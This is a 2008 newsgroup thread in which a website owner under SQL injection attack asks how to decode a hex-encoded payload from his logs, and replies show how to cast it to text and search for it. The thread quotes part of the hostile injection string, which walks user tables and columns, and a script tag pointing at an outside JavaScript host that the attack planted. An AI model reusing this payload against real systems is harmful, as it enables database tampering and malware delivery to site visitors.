sql injection gibberish

4 views
Skip to first unread message

shank

unread,
Jul 14, 2008, 8:49:54 AM7/14/08
to
I'm finally winning against the script injection attacks.

How can I convert the below gibberish into code I can understand?
I'd like to know what they are throwin' at me.

title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

thanks


SQL Menace

unread,
Jul 14, 2008, 10:07:43 AM7/14/08
to
Take a look here
http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx


Denis The SQL Menace
http://www.lessthandot.com/
http://sqlservercode.blogspot.com
http://sqlblog.com/blogs/denis_gobo/default.aspx


On Jul 14, 8:49 am, "shank" <sh...@tampabay.rr.com> wrote:
> I'm finally winning against the script injection attacks.
>
> How can I convert the below gibberish into code I can understand?
> I'd like to know what they are throwin' at me.
>

> title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204­054205641524348415228323535292C40432056415

Plamen Ratchev

unread,
Jul 14, 2008, 10:24:04 AM7/14/08
to
Take a look at the following article, it explains in details this type of
SQL injection attack:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

HTH,

Plamen Ratchev
http://www.SQLStudio.com

Mike C#

unread,
Jul 14, 2008, 2:44:42 PM7/14/08
to
FWIW here's a translation of what you posted:

DECLARE @S VARCHAR(4000);SET @S='DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR ...

Hackers + Dynamic SQL + Cursors ==> Wow. The best of all possible worlds.

--

========
Michael Coles
"Pro SQL Server 2008 XML"
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/

"shank" <sh...@tampabay.rr.com> wrote in message
news:O9gJ1fb...@TK2MSFTNGP05.phx.gbl...

Eric Isaacs

unread,
Jul 14, 2008, 3:10:56 PM7/14/08
to
You could try...

PRINT CAST(0x4445434C415245204­


054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

AS VARCHAR(8000))

...to see what it's converts to in VARCHAR.

-Eric Isaacs

shank

unread,
Jul 14, 2008, 5:33:11 PM7/14/08
to
OK... much appreciated... but how did you translate?
thanks

"Mike C#" <x...@xyz.com> wrote in message
news:ubf3QGe5...@TK2MSFTNGP06.phx.gbl...

Michael Coles

unread,
Jul 15, 2008, 1:15:45 AM7/15/08
to
"shank" <sh...@tampabay.rr.com> wrote in message
news:uGta9kf5...@TK2MSFTNGP05.phx.gbl...

> OK... much appreciated... but how did you translate?
> thanks

I just did a SELECT CAST(<insert binary string here> AS VARCHAR(MAX)). You
were probably getting gibberish if you were trying to convert the exact
string you posted since it has an odd number of characters. Delete the 6
from the end and try again.

shank

unread,
Jul 17, 2008, 9:52:58 PM7/17/08
to
I used your sample below to decode.

How can I encode the following: <script
src=http://www.xxxxx.ru/ngg.js></script>

So I can make it easier to find the entry in the logs? They're hittin' my
server through a dozen sites all day long. I've go them down to 95%
failures. But I still get that one that gets through and I need to find
which page is being assaulted. It would be easier if I could search for the
exact encoded characters.

thanks
================================

"Eric Isaacs" <eis...@gmail.com> wrote in message
news:4bcd7b5b-09e1-43ef...@k30g2000hse.googlegroups.com...

Eric Isaacs

unread,
Jul 18, 2008, 2:11:59 PM7/18/08
to
> How can I encode the following:

SELECT CAST('<script src=http://www.xxxxx.ru/ngg.js></script>' AS
VARBINARY)

You could also convert/cast the binary to string and search that
result for it as well.

Make sure that the infected fields aren't truncated too. Some of
these SQL injection attacks truncated data when they appended the
scripts. So you may have lost data as well, and removing the scripts
won't fix everything. A DB backup may be the only way to fix some of
them.

-Eric Isaacs

Reply all
Reply to author
Forward
0 new messages